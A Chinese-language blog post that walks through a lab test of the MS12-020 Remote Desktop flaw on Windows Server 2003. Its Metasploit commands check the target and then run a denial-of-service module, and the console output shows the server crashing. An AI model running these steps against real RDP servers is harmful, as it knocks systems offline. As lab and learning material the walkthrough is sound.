使用metasploit(MSF)對windows的ms12-020漏洞進行利用的過程

原創 D-river 2018-08-22 00:54

前言

攻擊者向受影響的系統發送一系列特製 RDP 數據包,則這個漏洞可能造成拒絕服務攻擊或允許遠程執行代碼。默認情況下,任何 Windows 操作系統都未啓用遠程桌面協議 (RDP,默認端口3389)。沒有啓用 RDP 的系統不受威脅。此實驗對目標系統造成了DOS攻擊。

0x01 實驗環境

攻擊機:kali linux
ip:192.168.8.130
目標機:windows server 2003 Enterprise x64 SP2
ip:192.168.8.129

0x02 漏洞驗證

使用msf的模塊:auxiliary/scanner/rdp/ms12_020_check驗證目標機是否具有此漏洞

msf > use auxiliary/scanner/rdp/ms12_020_check
msf auxiliary(ms12_020_check) > set RHOSTS 192.168.8.129
msf auxiliary(ms12_020_check) > info

       Name: MS12-020 Microsoft Remote Desktop Checker
     Module: auxiliary/scanner/rdp/ms12_020_check
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Royce Davis "R3dy" <[email protected]>
  Brandon McCann "zeknox" <[email protected]>

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS   192.168.8.129    yes       The target address range or CIDR identifier
  RPORT    3389             yes       Remote port running RDP (TCP)
  THREADS  100              yes       The number of concurrent threads

Description:
  This module checks a range of hosts for the MS12-020 vulnerability. 
  This does not cause a DoS on the target.

References:
  https://cvedetails.com/cve/CVE-2012-0002/
  https://technet.microsoft.com/en-us/library/security/MS12-020
  http://technet.microsoft.com/en-us/security/bulletin/ms12-020
  https://www.exploit-db.com/exploits/18606
  https://svn.nmap.org/nmap/scripts/rdp-vuln-ms12-020.nse

運行後顯示目標系統具有此漏洞:

msf auxiliary(ms12_020_check) > run

[+] 192.168.8.129:3389    - 192.168.8.129:3389 - The target is vulnerable.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

0x03 漏洞利用

msf auxiliary(ms12_020_check) > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > show options 

Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.8.129    yes       The target address
   RPORT  3389             yes       The target port (TCP)
msf auxiliary(ms12_020_maxchannelids) > run

[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - 210 bytes sent
[*] 192.168.8.129:3389 - 192.168.8.129:3389 - Checking RDP status...
[+] 192.168.8.129:3389 - 192.168.8.129:3389 seems down
[*] Auxiliary module execution completed

運行模塊後,目標系統windows server 2003 藍屏宕機:
這裏寫圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

Python與家國天下

豌豆花下貓 2019-02-24 22:22:40

windows下配置php

jason1982 2019-02-24 12:57:09

windows2003+CA+S3300+802.1X

qyh282110204 2019-02-23 14:05:36

win7如何以管理員身份登錄

wwtwwttc 2019-02-23 14:05:22

windows系統常用快捷鍵

LQ_112 2019-02-23 13:47:18

FIRST_MFC

youyou輝 2019-02-23 13:38:56

Antigen for exchange 部署+評測

coinking 2019-02-23 13:36:48

windows2003前言

starruning 2019-02-23 13:33:37

windows server 2008 登錄中 取消CTRL+ALT+DEL

菜鳥小苗 2019-02-23 13:31:29

windows server 2008中實現顆粒化的密碼策略

菜鳥小苗 2019-02-23 13:31:29

教你如何隱藏windows系統賬戶

幽鳴草 2019-02-23 13:28:10

linux下掛載windows NFS文件共享出錯

chefei0824 2019-02-23 13:27:20

win2000/xp自動關機技巧

hack_888 2019-02-23 13:24:59

迴歸Dos操作的快感,進入PowerShell世界

wwtwwttc 2019-02-23 14:05:21

dos窗口連接數據庫

曉竹 2019-02-23 13:35:55